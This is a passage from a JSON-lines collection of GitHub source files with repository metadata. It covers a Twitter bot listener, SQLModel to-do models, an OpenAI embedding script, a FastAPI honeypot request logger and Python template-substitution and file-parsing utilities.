UserHandlerException\n\n\nclass ResponseBotListener(object):\n \"\"\"\n Forward received tweets from :class:`~responsebot.responsebot_stream.ResponseBotStream`\n \"\"\"\n def __init__(self, handler_classes, client):\n \"\"\"\n Inits the listener and tries to create handler instances from discovered user's handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n :param client: Some Twitter API client for authentication. E.g. :class:`~responsebot.tweet_client.TweetClient`\n \"\"\"\n self.client = client\n self.handlers = []\n\n self.register_handlers(handler_classes)\n\n def register_handlers(self, handler_classes):\n \"\"\"\n Create handlers from discovered handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n \"\"\"\n for handler_class in handler_classes:\n try:\n self.handlers.append(handler_class(client=self.client))\n logging.info('Successfully registered {handler_class}'.format(handler_class=getattr(handler_class, '__name__', str(handler_class))))\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n\n def on_tweet(self, tweet):\n \"\"\"\n Callback to receive tweet from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the\n received tweet to registered handlers.\n\n :param tweet: An object containing a tweet's text and metadata\n :type tweet: :class:`~responsebot.models.Tweet`\n :raises :class:`~responsebot.common.exceptions.UserHandlerException`: If there is some unknown error from a custom handler\n \"\"\"\n logging.info('Received tweet: `{message}`'.format(message=tweet.text))\n\n for handler in self.handlers:\n try:\n handler.on_tweet(tweet)\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n", "repo_name": "anhhuy1605/test_rtd", "sub_path": "responsebot/listeners/responsebot_listener.py", "file_name": "responsebot_listener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "70325733608", "text": "from datetime import datetime\nfrom enum import Enum\nfrom typing import Optional\n\nfrom pydantic import BaseModel\nfrom sqlmodel import Column, DateTime, Field, ForeignKey, SQLModel\n\n\nclass TodoListBase(SQLModel):\n title: str\n description: str\n\n\nclass TodoListCreate(TodoListBase):\n pass\n\n\nclass TodoListUpdate(BaseModel):\n title: Optional[str] = None\n description: Optional[str] = None\n\n\nclass TodoList(TodoListBase, table=True):\n __tablename__ = \"todo_list\"\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: Optional[int] = Field(\n default=None, sa_column=Column(ForeignKey(\"user.id\", ondelete=\"CASCADE\"))\n )\n created_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n updated_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n\n\nclass TodoListSortingFields(str, Enum):\n id = \"id\"\n title = \"title\"\n created_date = \"created_date\"\n updated_date = \"updated_date\"\n", "repo_name": "testownik-pwr-portal/portal", "sub_path": "backend/app/app/models/todo_list.py", "file_name": "todo_list.py", "file_ext": "py", "file_size_in_byte": 1055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.SQLModel", "line_number": 9, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlmodel.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "16271165720", "text": "import requests\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\npersonal_api_key = os.getenv(\"PERSONAL_API_KEY\")\nopen_ai_api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\n\ndef get_token():\n payload = {\"apikey\": personal_api_key}\n response = requests.post('https://zadania.aidevs.pl/token/embedding', json=payload)\n return response.json().get('token')\n\n\ndef create_embedding():\n token = get_token()\n data = {\"input\": 'Hawaiian pizza', \"model\": \"text-embedding-ada-002\"}\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + open_ai_api_key}\n response = requests.post('https://api.openai.com/v1/embeddings', json=data, headers=headers)\n embedding = response.json()['data'][0]['embedding']\n return embedding, token\n\n\ndef send_answer():\n embedding, token = create_embedding()\n payload = {\"answer\": embedding}\n response = requests.post(f'https://zadania.aidevs.pl/answer/{token}', json=payload)\n return response.json()\n\n\nprint(send_answer())\n", "repo_name": "bartoszc/AI_Devs", "sub_path": "embedding.py", "file_name": "embedding.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 14, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "603120841", "text": "import uvicorn as uvicorn\nimport json\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom starlette.routing import Match\nfrom loguru import logger\n\nimport os\nimport shutil\n\n# Serve our static web portal\nfrom starlette.templating import Jinja2Templates\nfrom starlette.routing import Route, Mount\nfrom starlette.exceptions import HTTPException\n\ntemplates = Jinja2Templates(directory='webapp')\nasync def not_found(request: Request, exc: HTTPException):\n return RedirectResponse(\"/index.html\")\n\nexception_handlers = {\n 404: not_found\n}\n\napp = FastAPI(openapi_url=None, exception_handlers=exception_handlers)\nshared_honeypot_dir = \"/custom_honey\"\nshared_storage_dir = \"/honey_store\"\n# Might have some static file caching issue\napp.mount(\"/\", StaticFiles(directory=f\"{shared_honeypot_dir}/webapp\", html=True, check_dir=False), name=\"webapp\")\n\n@app.middleware(\"http\")\nasync def log_middle(request: Request, call_next):\n\n # Copy Default Honeypot if folder is empty\n if os.path.isdir(f\"{shared_honeypot_dir}/webapp\") and len(os.listdir(f\"{shared_honeypot_dir}/webapp\")) == 0:\n os.rmdir(f\"{shared_honeypot_dir}/webapp\")\n shutil.copytree(\"/app/webapp\", f\"{shared_honeypot_dir}/webapp\")\n\n routes = request.app.router.routes\n send_param = None\n for route in routes:\n match, scope = route.matches(request)\n if match == Match.FULL:\n send_param = list(scope[\"path_params\"].items())\n\n send_head = request.headers.items()\n send_body = (await request.body()).decode(\"utf-8\")\n packed_boi = {\"method\":request.method,\"url\":str(request.url),\"param\":send_param,\"headers\":send_head,\"body\":send_body}\n packed_json = json.dumps(packed_boi)\n\n with open(f\"{shared_storage_dir}/fastpotlogs.json\", 'a+') as outfile:\n outfile.write(\"\\n\")\n outfile.write(packed_json)\n\n response = await call_next(request)\n return response\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host='0.0.0.0', port=8000)\n\n", "repo_name": "FA-PengFei/NGWAF", "sub_path": "ngwaf-app/fastpot/fastpotty/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "53", "api": [{"api_name": "starlette.templating.Jinja2Templates", "line_number": 17, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 18, "usage_type": "name"}, {"api_name": "starlette.exceptions.HTTPException", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi.staticfiles.StaticFiles", "line_number": 29, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 36, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 37, "usage_type": "call"}, {"api_name": "starlette.routing.Match.FULL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "starlette.routing.Match", "line_number": 43, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "9343915340", "text": "\"\"\"\nA collection of utilities for file wrapping.\n\nNote: This is a work in progress.\n\"\"\"\n\n\nimport re\n\ntry:\n import pyparsing\n from pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \\\n TokenConverter, Word, nums, oneOf, printables, ParserElement, alphanums\nexcept ImportError:\n pyparsing = None\n TokenConverter = object\n\nimport numpy as np\n\n\ndef _getformat(val):\n \"\"\"\n Get the output format for a floating point number.\n\n The general format is used with 16 places of accuracy, except for when\n the floating point value is an integer, in which case a decimal point\n followed by a single zero is used.\n\n Parameters\n ----------\n val : float or int\n the number which needs formatted.\n\n Returns\n -------\n string\n the format string.\n \"\"\"\n if int(val) == val:\n return \"%.1f\"\n else:\n return \"%.16g\"\n\n\nclass _SubHelper(object):\n \"\"\"\n Replaces file text at the correct word location in a line.\n\n This class contains the Helper Function that is passed to re.sub.\n\n Attributes\n ----------\n _newtext : str\n text to insert.\n _replace_location : int\n location in the file where replacement is to occur.\n _current_location : int\n current location in the file.\n _counter : int\n counter\n _start_location : int\n initial location where replacement is to occur.\n _end_location : int\n final location where replacement is to occur.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n self._newtext = \"\"\n self._replace_location = 0\n self._current_location = 0\n self._counter = 0\n self._start_location = 0\n self._end_location = 0\n\n def set(self, newtext, location):\n \"\"\"\n Set a new word location and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n location : int\n location in the file where replacement is to occur.\n \"\"\"\n self._newtext = newtext\n self._replace_location = location\n self._current_location = 0\n\n def set_array(self, newtext, start_location, end_location):\n \"\"\"\n Set a new starting location, ending location, and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n start_location : int\n location\n end_location : int\n location\n \"\"\"\n self._newtext = newtext\n self._start_location = start_location\n self._end_location = end_location\n self._current_location = 0\n\n def replace(self, text):\n \"\"\"\n Replace text in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n\n if self._current_location == self._replace_location:\n if isinstance(self._newtext, float):\n return _getformat(self._newtext) % self._newtext\n else:\n return str(self._newtext)\n else:\n return text.group()\n\n def replace_array(self, text):\n \"\"\"\n Replace array of text values in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n end = len(self._newtext)\n\n if self._current_location >= self._start_location and \\\n self._current_location <= self._end_location and \\\n self._counter < end:\n if isinstance(self._newtext[self._counter], float):\n val = self._newtext[self._counter]\n newval = _getformat(val) % val\n else:\n newval = str(self._newtext[self._counter])\n self._counter += 1\n return newval\n else:\n return text.group()\n\n\nclass _ToInteger(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into an int.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into an integer.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n int\n integer value for token.\n \"\"\"\n return int(tokenlist[0])\n\n\nclass _ToFloat(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into a float.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into a float.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n float value for token.\n \"\"\"\n return float(tokenlist[0].replace('D', 'E'))\n\n\nclass _ToNan(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python nan.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python nan.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for NaN.\n \"\"\"\n return float('nan')\n\n\nclass _ToInf(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python inf.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python inf.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for infinity.\n \"\"\"\n return float('inf')\n\n\nclass InputFileGenerator(object):\n \"\"\"\n Utility to generate an input file from a template.\n\n Substitution of values is supported. Data is located with a simple API.\n\n Attributes\n ----------\n _template_filename : str or None\n the name of the template file.\n _output_filename : str or None\n the name of the output file.\n _delimiter : int\n delimiter.\n _reg : int\n regular expression.\n _data : list of string\n the contents of the file, by line\n _current_row : int\n the current row of the file\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. Try 'pip install pyparsing'.\")\n\n self._template_filename = None\n self._output_filename = None\n\n self._delimiter = \" \"\n self._reg = re.compile('[^ \\n]+')\n\n self._data = []\n self._current_row = 0\n self._anchored = False\n\n def set_template_file(self, filename):\n \"\"\"\n Set the name of the template file to be used.\n\n The template file is also read into memory when this method is called.\n\n Parameters\n ----------\n filename : str\n Name of the template file to be used.\n \"\"\"\n self._template_filename = filename\n\n templatefile = open(filename, 'r')\n self._data = templatefile.readlines()\n templatefile.close()\n\n def set_generated_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._output_filename = filename\n\n def set_delimiters(self, delimiter):\n \"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters.\n \"\"\"\n self._delimiter = delimiter\n self._reg = re.compile('[^' + delimiter + '\\n]+')\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark.\n\n This lets you describe data by relative position. Note that a forward\n search begins at the old anchor location. If you want to restart the\n search for the anchor at the file beginning, then call ``reset_anchor()``\n before ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n\n occurrence : int, optional\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in template file %s\" %\n (anchor, self._template_filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_var(self, value, row, field):\n \"\"\"\n Change a single variable in the template relative to the current anchor.\n\n Parameters\n ----------\n value : float, int, bool, str\n New value to set at the location.\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n Which word in line to replace, as denoted by delimiter(s).\n \"\"\"\n j = self._current_row + row\n line = self._data[j]\n\n sub = _SubHelper()\n sub.set(value, field)\n newline = re.sub(self._reg, sub.replace, line)\n\n self._data[j] = newline\n\n def transfer_array(self, value, row_start, field_start, field_end,\n row_end=None, sep=\", \"):\n \"\"\"\n Change the values of an array in the template relative to the current anchor.\n\n This should generally be used for one-dimensional or free form arrays.\n\n Parameters\n ----------\n value : float, int, bool, str\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n row_end : int, optional\n Use if the array wraps to cover additional lines.\n sep : int, optional\n Separator to use if we go beyond the template.\n \"\"\"\n # Simplified input for single-line arrays\n if row_end is None:\n row_end = row_start\n\n sub = _SubHelper()\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n if row == row_end:\n f_end = field_end\n else:\n f_end = 99999\n\n sub.set_array(value, field_start, f_end)\n field_start = 0\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n # Sometimes an array is too large for the example in the template\n # This is resolved by adding more fields at the end\n if sub._counter < len(value):\n for val in value[sub._counter:]:\n newline = newline.rstrip() + sep + str(val)\n self._data[j] = newline\n\n # Sometimes an array is too small for the template\n # This is resolved by removing fields\n elif sub._counter > len(value):\n # TODO - Figure out how to handle this.\n # Ideally, we'd remove the extra field placeholders\n raise ValueError(\"Array is too small for the template.\")\n\n def transfer_2Darray(self, value, row_start, row_end, field_start, field_end):\n \"\"\"\n Change the values of a 2D array in the template relative to the current anchor.\n\n This method is specialized for 2D arrays, where each row of the array is\n on its own line.\n\n Parameters\n ----------\n value : ndarray\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n row_end : int\n Final row for the array, relative to the anchor.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n \"\"\"\n sub = _SubHelper()\n\n i = 0\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n sub.set_array(value[i, :], field_start, field_end)\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n sub._current_location = 0\n sub._counter = 0\n i += 1\n\n # TODO - Note, we currently can't handle going beyond the end of\n # the template line\n\n def clearline(self, row):\n \"\"\"\n Replace the contents of a row with the newline character.\n\n Parameters\n ----------\n row : int\n Row number to clear, relative to current anchor.\n \"\"\"\n self._data[self._current_row + row] = \"\\n\"\n\n def generate(self, return_data=False):\n \"\"\"\n Use the template file to generate the input file.\n\n Parameters\n ----------\n return_data : bool\n If True, generated file data will be returned as a string.\n\n Returns\n -------\n string\n The generated file data if return_data is True or output filename\n has not been provided, else None.\n \"\"\"\n if self._output_filename:\n with open(self._output_filename, 'w') as f:\n f.writelines(self._data)\n else:\n return_data = True\n\n if return_data:\n return '\\n'.join(self._data)\n else:\n return None\n\n\nclass FileParser(object):\n \"\"\"\n Utility to locate and read data from a file.\n\n Parameters\n ----------\n end_of_line_comment_char : str, optional\n End-of-line comment character to be ignored\n (e.g., Python supports in-line comments with \"#\").\n\n full_line_comment_char : str, optional\n Comment character that signifies a line should be skipped.\n\n Attributes\n ----------\n _filename : str\n the name of the file.\n _data : list of string\n the contents of the file, by line\n _delimiter : str\n the name of the file.\n _end_of_line_comment_char : str\n end-of-line comment character to be ignored.\n _full_line_comment_char : str\n comment character that signifies a line should be skipped.\n _current_row : int\n the current row of the file.\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. Try 'pip install pyparsing'.\")\n\n self._filename = None\n self._data = []\n\n self._delimiter = \" \\t\"\n self._end_of_line_comment_char = end_of_line_comment_char\n self._full_line_comment_char = full_line_comment_char\n\n self._current_row = 0\n self._anchored = False\n\n self.set_delimiters(self._delimiter)\n\n def set_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._filename = filename\n\n inputfile = open(filename, 'r')\n\n if not self._end_of_line_comment_char and not self._full_line_comment_char:\n self._data = inputfile.readlines()\n else:\n self._data = []\n for line in inputfile:\n if line[0] == self._full_line_comment_char:\n continue\n self._data.append(line.split(self._end_of_line_comment_char)[0])\n\n inputfile.close()\n\n def set_delimiters(self, delimiter):\n r\"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters. The\n default value is ' \\t', which means that spaces and tabs are not\n taken as data but instead mark the boundaries. Note that the\n parser is smart enough to recognize characters within quotes as\n non-delimiters.\n \"\"\"\n self._delimiter = delimiter\n\n if delimiter != \"columns\":\n ParserElement.setDefaultWhitespaceChars(str(delimiter))\n\n self._reset_tokens()\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark, which lets you describe data by relative position.\n\n Note that a forward search begins at the old anchor location. If you want to restart\n the search for the anchor at the file beginning, then call ``reset_anchor()`` before\n ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n occurrence : int\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if anchor in line:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if anchor in line:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in output file %s\" %\n (anchor, self._filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_line(self, row):\n \"\"\"\n Return an entire line, relative to current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n\n Returns\n -------\n string\n Line at the location requested.\n \"\"\"\n return self._data[self._current_row + row].rstrip()\n\n def transfer_var(self, row, field, fieldend=None):\n \"\"\"\n Get a single variable relative to the current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n If the delimiter is a set of chars: which word in line to retrieve.\n If the delimiter is 'columns': character position to start.\n fieldend : int (optional)\n If the delimiter is a set of chars: IGNORED.\n If the delimiter is 'columns': position of last character to return, or if\n omitted, the end of the line is used.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j = self._current_row + row\n\n line = self._data[j]\n\n if self._delimiter == \"columns\":\n if not fieldend:\n line = line[(field - 1):]\n else:\n line = line[(field - 1):(fieldend)]\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n data = self._parse_line().parseString(line)\n\n # data might have been split if it contains whitespace. If so,\n # just return the whole string\n if len(data) > 1:\n return line\n else:\n return data[0]\n else:\n data = self._parse_line().parseString(line)\n return data[field - 1]\n\n def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):\n \"\"\"\n Search for a key relative to the current anchor and get a field from that line.\n\n You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.\n This function just combines them for convenience.\n\n Parameters\n ----------\n key : str\n The key to search for.\n field : int\n Which field to transfer. Field 0 is the key.\n occurrence : int\n Find nth instance of text; default is 1 (first value\n field). Use -1 to find last occurance. Position 0 is the key\n field, so it should not be used as a value for occurrence.\n rowoffset : int (optional)\n Optional row offset from the occurrence of key. This can\n also be negative.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if not isinstance(occurrence, int) or occurrence == 0:\n msg = \"The value for occurrence must be a nonzero integer\"\n raise ValueError(msg)\n\n instance = 0\n if occurrence > 0:\n row = 0\n for line in self._data[self._current_row:]:\n if line.find(key) > -1:\n instance += 1\n if instance == occurrence:\n break\n row += 1\n\n elif occurrence < 0:\n row = -1\n for line in reversed(self._data[self._current_row:]):\n if line.find(key) > -1:\n instance += -1\n if instance == occurrence:\n break\n row -= 1\n\n j = self._current_row + row + rowoffset\n line = self._data[j]\n\n fields = self._parse_line().parseString(line.replace(key, \"KeyField\"))\n\n return fields[field]\n\n def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):\n \"\"\"\n Get an array of variables relative to the current anchor.\n\n Setting the delimiter to 'columns' elicits some special behavior\n from this method. Normally, the extraction process wraps around\n at the end of a line and continues grabbing each field at the start of\n a newline. When the delimiter is set to columns, the parameters\n (rowstart, fieldstart, rowend, fieldend) demark a box, and all\n values in that box are retrieved. Note that standard whitespace\n is the secondary delimiter in this case.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int, optional\n Row number to end. If not set, then only one row is grabbed.\n fieldend : int\n Field number to end.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j1 = self._current_row + rowstart\n\n if rowend is None:\n j2 = j1 + 1\n else:\n j2 = self._current_row + rowend + 1\n\n if not fieldend:\n raise ValueError(\"fieldend is missing, currently required\")\n\n lines = self._data[j1:j2]\n\n data = np.zeros(shape=(0, 0))\n\n for i, line in enumerate(lines):\n if self._delimiter == \"columns\":\n line = line[(fieldstart - 1):fieldend]\n\n # Stripping whitespace may be controversial.\n line = line.strip()\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n parsed = self._parse_line().parseString(line)\n\n newdata = np.array(parsed[:])\n # data might have been split if it contains whitespace. If the\n # data is string, we probably didn't want this.\n if newdata.dtype.type is np.str_:\n newdata = np.array(line)\n\n data = np.append(data, newdata)\n else:\n parsed = self._parse_line().parseString(line)\n\n if i == j2 - j1 - 1:\n data = np.append(data, np.array(parsed[(fieldstart - 1):fieldend]))\n else:\n data = np.append(data, np.array(parsed[(fieldstart - 1):]))\n\n fieldstart = 1\n\n return data\n\n def transfer_2Darray(self, rowstart, fieldstart, rowend, fieldend=None):\n \"\"\"\n Get a 2D array of variables relative to the current anchor.\n\n Each line of data is placed in a separate row.\n\n If the delimiter is set to 'columns', then the values contained in\n fieldstart and fieldend should be the column number instead of the\n field number.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int\n Row number to end relative to current anchor.\n fieldend : int (optional)\n Field number to end. If not specified, grabs all fields up to the\n end of the line.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if fieldend and (fieldstart > fieldend):\n msg = \"fieldend must be greater than fieldstart\"\n raise ValueError(msg)\n\n if rowstart > rowend:\n msg = \"rowend must be greater than rowstart\"\n raise 